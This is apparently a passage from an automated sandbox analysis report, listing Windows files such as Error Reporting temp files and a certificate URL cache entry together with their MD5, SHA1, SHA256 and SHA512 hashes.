| MD5 | 13ef68fb4e61d63143470b36786c4484 |
| SHA1 | 00007ae99e2ae4bf7e4e1fb15a7927d42c1b5fce |
| SHA256 | 1e1e523890db643d90d9beb9bd555c9e58569c4f4a5329d2c3170e5a6587ec11 |
| SHA512 | 52f81da16f8267940caf756eb2f6978a2984311a3e5e8fc70050b72d6ab81e018c78f567e507cfed1c8338efeb0df71938146ac0ed33751b2850888fdcc266f3 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.13525c67-d246-49b1-9cc9-aaea80c983f7.tmp.csv
| MD5 | 120dfd230113d7564374f16309415b42 |
| SHA1 | 43a47aad948a8439c582fe61b7aa90595254870c |
| SHA256 | b2efe62d0970e670457d53676caee2888956ebaa66450fac9d45a2e4301b4bde |
| SHA512 | 6bd90034fdcdaf9b6f738c1bc72e1639affb8f595194263f318366d36c2019fd32000afe6bb407e25fc4718bc099efcff1ab4bd431f712dff498cee7f0033d44 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d196a0d9-62fe-4327-b08f-bb9ff5b1ec9b.tmp.txt
| MD5 | 4d5b955f5cd01bc211f1a5171b206ada |
| SHA1 | b22825b3ec9c7e68801fad0bc4ee8e351446c95c |
| SHA256 | e53e8975b34fc62b24856588b1642cef8db319125bdb05b6c5793b11516379c6 |
| SHA512 | 6b8330d266ce448a955283a5736f1eb9f6c5065d9b76e4b38500af9a38723745fc887f7b60270a68cd4fcd28468f4872076f7bd19b5eb924a64c14394f8b67b0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | cb9ee6118f51a0a5430cca6cbc4e2df8 |
| SHA1 | 231c6223dee2094738bd65210e56dddfde19ebf9 |
| SHA256 | 7e134f47993f776d4000d86c6940491bf682735097997d3df713592a83267404 |
| SHA512 | 5fb227f526c6d93e55e0e7e504d1336d6ed5ec60f62d18771c2d3970bd25f3a0c4f5619162d33a66f1495850a6f16bff0deabf9f2752053fc84cca16312349d6 |
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
| MD5 | 713235d54dfa7cc46c168aff278a35e5 |
| SHA1 | 8a2420651da8dfb4f3a2fc2d74a0174813709ecd |
| SHA256 | af8df51b7bb0977ed751957cdbc25e4bd55ebe37f3382cd94246dff58a0ce0e1 |
| SHA512 | 359d3ed14ad983dca7c1645540f62ef809620d7518e27bca731fb2946c3658601b8ed7c73952c985cda6a8516434cb920094ba27120731c759b7c8d15b6b5154 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.73d7450b-e12d-4fe1-b79d-4b898a10ab60.tmp.csv
| MD5 | 3a3667a8167841dd05fd5659a3f792fc |
| SHA1 | 2f10890642fd8967216030118f71878ba354a85b |
| SHA256 | f6aeedfacb6337bc5385697d671879fcb041743cec6d334c254f38c3957688c0 |
| SHA512 | 08ae11df864fc5dcf531483ba622f6b67f88ac90b3bdc58d5dfadbbe681f14edd745c1b09c5a42780763c16ddb41c45379512c23a50d504e2a38f31201fd098c |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.2b635f1f-dbf4-4168-933a-a601aed43ea3.tmp.txt
| MD5 | b9bc230d8f68396be986edde3b3c121a |
| SHA1 | 3ca9e4ce80a10d44561ca568c2ab00125258e68d |
| SHA256 | 16f93c086e7e5801ec888eb096660d80199c143869548ac5d73af5121836a92d |
| SHA512 | 191811eb896cc8a8a926935616040a8a35aabb7c269ee4625a00a81193f66e92e9439e05032cedb2be76eef773a3e11fb3e894870899bb05f432c5d30b5693f3 |